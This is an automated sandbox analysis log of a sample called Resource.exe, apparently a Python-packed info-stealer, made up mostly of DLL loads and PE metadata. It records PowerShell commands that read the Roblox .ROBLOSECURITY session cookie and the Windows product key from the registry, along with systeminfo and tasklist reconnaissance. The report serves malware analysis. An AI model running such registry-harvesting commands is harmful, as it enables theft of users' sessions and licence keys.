              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windowscodecs.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dll
              Source: C:\Windows\System32\tree.comSection loaded: ulib.dll
              Source: C:\Windows\System32\tree.comSection loaded: fsutilext.dll
              Source: C:\Windows\System32\attrib.exeSection loaded: ulib.dll
              Source: C:\Windows\System32\attrib.exeSection loaded: fsutilext.dll
              Source: C:\Windows\System32\getmac.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\getmac.exeSection loaded: wkscli.dll
              Source: C:\Windows\System32\getmac.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\getmac.exeSection loaded: mpr.dll
              Source: C:\Windows\System32\getmac.exeSection loaded: framedynos.dll
              Source: C:\Windows\System32\getmac.exeSection loaded: srvcli.dll
              Source: C:\Windows\System32\getmac.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\getmac.exeSection loaded: uxtheme.dll
              Source: C:\Windows\System32\getmac.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\System32\getmac.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\getmac.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\getmac.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\tree.comSection loaded: ulib.dll
              Source: C:\Windows\System32\tree.comSection loaded: fsutilext.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: version.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: mscoree.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptsp.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: rsaenh.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptbase.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptsp.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: rsaenh.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptbase.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\tree.comSection loaded: ulib.dll
              Source: C:\Windows\System32\tree.comSection loaded: fsutilext.dll
              Source: C:\Windows\System32\attrib.exeSection loaded: ulib.dll
              Source: C:\Windows\System32\attrib.exeSection loaded: fsutilext.dll
              Source: C:\Windows\System32\tree.comSection loaded: ulib.dll
              Source: C:\Windows\System32\tree.comSection loaded: fsutilext.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: version.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\tree.comSection loaded: ulib.dll
              Source: C:\Windows\System32\tree.comSection loaded: fsutilext.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
              Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: mpclient.dll
              Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: secur32.dll
              Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: sspicli.dll
              Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: version.dll
              Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: msasn1.dll
              Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: kernel.appcore.dll
              Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: userenv.dll
              Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: gpapi.dll
              Source: C:\Windows\System32\cmd.exeSection loaded: apphelp.dll
              Source: C:\Users\user\AppData\Local\Temp\_MEI66322\rar.exeSection loaded: powrprof.dll
              Source: C:\Users\user\AppData\Local\Temp\_MEI66322\rar.exeSection loaded: umpdc.dll
              Source: C:\Users\user\AppData\Local\Temp\_MEI66322\rar.exeSection loaded: windows.storage.dll
              Source: C:\Users\user\AppData\Local\Temp\_MEI66322\rar.exeSection loaded: wldp.dll
              Source: C:\Users\user\AppData\Local\Temp\_MEI66322\rar.exeSection loaded: kernel.appcore.dll
              Source: C:\Users\user\AppData\Local\Temp\_MEI66322\rar.exeSection loaded: uxtheme.dll
              Source: C:\Users\user\AppData\Local\Temp\_MEI66322\rar.exeSection loaded: propsys.dll
              Source: C:\Users\user\AppData\Local\Temp\_MEI66322\rar.exeSection loaded: profapi.dll
              Source: C:\Users\user\AppData\Local\Temp\_MEI66322\rar.exeSection loaded: dpapi.dll
              Source: C:\Users\user\AppData\Local\Temp\_MEI66322\rar.exeSection loaded: cryptbase.dll
              Source: C:\Users\user\AppData\Local\Temp\_MEI66322\rar.exeSection loaded: cryptsp.dll
              Source: C:\Users\user\AppData\Local\Temp\_MEI66322\rar.exeSection loaded: rsaenh.dll
              Source: C:\Users\user\AppData\Local\Temp\_MEI66322\rar.exeSection loaded: msasn1.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vbscript.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sxs.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
              Source: C:\Windows\System32\tasklist.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\systeminfo.exe systeminfo
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
              Source: C:\Windows\System32\mshta.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Settings
              Source: Window RecorderWindow detected: More than 3 window changes detected
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
              Source: Resource.exeStatic PE information: Image base 0x140000000 > 0x60000000
              Source: Resource.exeStatic file information: File size 7714511 > 1048576
              Source: Resource.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
              Source: Resource.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
              Source: Resource.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
              Source: Resource.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
              Source: Resource.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
              Source: Resource.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
              Source: Resource.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
              Source: Resource.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
              Source: Binary string: 8C:\Users\user\AppData\Local\Temp\erdw4v5g\erdw4v5g.pdbhP source: powershell.exe, 00000044.00000002.2259141089.000001B7D5905000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\select.pdb source: Resource.exe, 00000001.00000002.2487117258.00007FF8B9F61000.00000040.00000001.01000000.0000000D.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\unicodedata.pdb source: Resource.exe, 00000001.00000002.2480153841.00007FF8A8290000.00000040.00000001.01000000.00000013.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_ctypes.pdb source: Resource.exe, 00000001.00000002.2486477048.00007FF8B8F71000.00000040.00000001.01000000.00000006.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_hashlib.pdb source: Resource.exe, Resource.exe, 00000001.00000002.2485119166.00007FF8B7DF1000.00000040.00000001.01000000.00000011.sdmp
              Source: Binary string: D:\a\1\b\libssl-3.pdbEE source: Resource.exe, 00000001.00000002.2484486391.00007FF8A9355000.00000040.00000001.01000000.00000010.sdmp
              Source: Binary string: @ compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PICOpenSSL 3.0.11 19 Sep 20233.0.11built on: Wed Sep 27 22:33:28 2023 UTCplatform: VC-WIN64A-masmOPENSSLDIR: "C:\Program Files\Common Files\SSL"ENGINESDIR: "C:\Program Files\OpenSSL\lib\engines-3"MODULESDIR: "C:\Program Files\OpenSSL\lib\ossl-modules"CPUINFO: N/Anot availableget_and_lock..\s\crypto\ex_data.cossl_crypto_get_ex_new_index_exossl_crypto_new_ex_data_exCRYPTO_dup_ex_dataCRYPTO_set_ex_dataOPENSSL_WIN32_UTF8..\s\crypto\getenv.ccompiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC;CPUINFO: OPENSSL_ia32cap=0x%llx:0x%llxOPENSSL_ia32cap env:%sos-specificC:\Program Files\Common Files\SSLC:\Program Files\OpenSSL\lib\ossl-modules.dllCPUINFO: ..\s\crypto\init.cOPENSSL_init_cryptoOPENSSL_atexit..\s\crypto\initthread.c..\s\crypto\mem_sec.cassertion failed: (bit & 1) == 0assertion failed: list >= 0 && list < sh.freelist_sizeassertion failed: ((ptr - sh.arena) & ((sh.arena_size >> list) - 1)) == 0assertion failed: bit > 0 && bit < sh.bittable_sizeassertion failed: TESTBIT(table, bit)assertion failed: !TESTBIT(table, bit)assertion failed: WITHIN_FREELIST(list)assertion failed: WITHIN_ARENA(ptr)assertion failed: temp->next == NULL || WITHIN_ARENA(temp->next)assertion failed: (char **)temp->next->p_next == listassertion failed: WITHIN_FREELIST(temp2->p_next) || WITHIN_ARENA(temp2->p_next)assertion failed: size > 0assertion failed: (size & (size - 1)) == 0assertion failed: (minsize & (minsize - 1)) == 0assertion failed: sh.freelist != NULLassertion failed: sh.bittable != NULLassertion failed: sh.bitmalloc != NULLassertion failed: !sh_testbit(temp, slist, sh.bitmalloc)assertion failed: temp != sh.freelist[slist]assertion failed: sh.freelist[slist] == tempassertion failed: temp-(sh.arena_size >> slist) == sh_find_my_buddy(temp, slist)assertion failed: sh_testbit(chunk, list, sh.bittable)assertion failed: WITHIN_ARENA(chunk)assertion failed: sh_testbit(ptr, list, sh.bittable)assertion failed: ptr == sh_find_my_buddy(buddy, list)assertion failed: ptr != NULLassertion failed: !sh_testbit(ptr, list, sh.bitmalloc)assertion failed: sh.freelist[list] == ptr/*0123456789ABCDEFCRYPTO_memdup..\s\crypto\o_str.chexstr2buf_sepossl_hexstr2buf_sepbuf2hexstr_sepossl_buf2hexstr_sep..\s\crypto\packet.cwpacket_intern_init_lenWPACKET_start_sub_packet_len__..\s\crypto\param_build.cparam_pushparam_push_numOSSL_PARAM_BLD_push_BN_padNegative big numbers are unsupported for OSSL_PARAMOSSL_PARAM_BLD_push_utf8_stringOSSL_PARAM_BLD_push_utf8_ptrOSSL_PARAM_BLD_push_octet_stringOSSL_PARAM_BLD_push_octet_ptrOSSL_PARAM_BLD_to_param..\s\crypto\params.c source: Resource.exe, 00000001.00000002.2481190225.00007FF8A8642000.00000040.00000001.01000000.0000000F.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_lzma.pdbNN source: Resource.exe, 00000001.00000002.2486194119.00007FF8B8B3C000.00000040.00000001.01000000.00000008.sdmp
              Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC source: Resource.exe, Resource.exe, 00000001.00000002.2481190225.00007FF8A8642000.00000040.00000001.01000000.0000000F.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_queue.pdb source: Resource.exe, 00000001.00000002.2486921146.00007FF8B9841000.00000040.00000001.01000000.00000012.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_lzma.pdb source: Resource.exe, 00000001.00000002.2486194119.00007FF8B8B3C000.00000040.00000001.01000000.00000008.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_bz2.pdb source: Resource.exe, 00000001.00000002.2486713110.00007FF8B93C1000.00000040.00000001.01000000.00000009.sdmp
              Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: Resource.exe, 00000000.00000003.2015760387.00000203A2F43000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000002.2487613545.00007FF8BFAC1000.00000002.00000001.01000000.00000005.sdmp, VCRUNTIME140.dll.0.dr
              Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdbGCTL source: Resource.exe, 00000000.00000003.2015760387.00000203A2F43000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000002.2487613545.00007FF8BFAC1000.00000002.00000001.01000000.00000005.sdmp, VCRUNTIME140.dll.0.dr
              Source: Binary string: D:\a\1\b\bin\amd64\sqlite3.pdb source: Resource.exe, Resource.exe, 00000001.00000002.2482929598.00007FF8A87D1000.00000040.00000001.01000000.0000000B.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_socket.pdb source: Resource.exe, Resource.exe, 00000001.00000002.2485660803.00007FF8B7E51000.00000040.00000001.01000000.0000000C.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_sqlite3.pdb source: Resource.exe, Resource.exe, 00000001.00000002.2485937186.00007FF8B8AF1000.00000040.00000001.01000000.0000000A.sdmp
              Source: Binary string: 8C:\Users\user\AppData\Local\Temp\erdw4v5g\erdw4v5g.pdb source: powershell.exe, 00000044.00000002.2259141089.000001B7D5905000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: D:\a\1\b\libssl-3.pdb source: Resource.exe, Resource.exe, 00000001.00000002.2484486391.00007FF8A9355000.00000040.00000001.01000000.00000010.sdmp
              Source: Binary string: D:\Projects\WinRAR\rar\build\rar64\Release\RAR.pdb source: rar.exe, 00000067.00000002.2381200345.00007FF618630000.00000002.00000001.01000000.0000001E.sdmp, rar.exe, 00000067.00000000.2365890239.00007FF618630000.00000002.00000001.01000000.0000001E.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\python311.pdb source: Resource.exe, 00000001.00000002.2483357030.00007FF8A8CCB000.00000040.00000001.01000000.00000004.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_ssl.pdb source: Resource.exe, Resource.exe, 00000001.00000002.2485371418.00007FF8B7E11000.00000040.00000001.01000000.0000000E.sdmp
              Source: Resource.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
              Source: Resource.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
              Source: Resource.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
              Source: Resource.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
              Source: Resource.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

              Data Obfuscation

              barindex
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\erdw4v5g\erdw4v5g.cmdline"
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\erdw4v5g\erdw4v5g.cmdline"
              Source: C:\Users\user\Desktop\Resource.exeCode function: 1_2_00007FF8A8797B30 EntryPoint,LoadLibraryA,GetProcAddress,VirtualProtect,VirtualProtect,VirtualProtect,1_2_00007FF8A8797B30
              Source: Resource.exeStatic PE information: real checksum: 0x75d9e5 should be: 0x768972
              Source: _ctypes.pyd.0.drStatic PE information: real checksum: 0x0 should be: 0x15efe
              Source: unicodedata.pyd.0.drStatic PE information: real checksum: 0x0 should be: 0x5092b
              Source: _bz2.pyd.0.drStatic PE information: real checksum: 0x0 should be: 0x13929
              Source: libffi-8.dll.0.drStatic PE information: real checksum: 0x0 should be: 0xa1d1
              Source: _ssl.pyd.0.drStatic PE information: real checksum: 0x0 should be: 0x11c85
              Source: sqlite3.dll.0.drStatic PE information: real checksum: 0x0 should be: 0x9c034
              Source: erdw4v5g.dll.77.drStatic PE information: real checksum: 0x0 should be: 0x35c6
              Source: libcrypto-3.dll.0.drStatic PE information: real checksum: 0x0 should be: 0x192b2f
              Source: _queue.pyd.0.drStatic PE information: real checksum: 0x0 should be: 0xd294
              Source: _socket.pyd.0.drStatic PE information: real checksum: 0x0 should be: 0x1a544
              Source: python311.dll.0.drStatic PE information: real checksum: 0x0 should be: 0x1a0ee3
              Source: _decimal.pyd.0.drStatic PE information: real checksum: 0x0 should be: 0x24a43
              Source: _hashlib.pyd.0.drStatic PE information: real checksum: 0x0 should be: 0x16ee9
              Source: libssl-3.dll.0.drStatic PE information: real checksum: 0x0 should be: 0x396d1
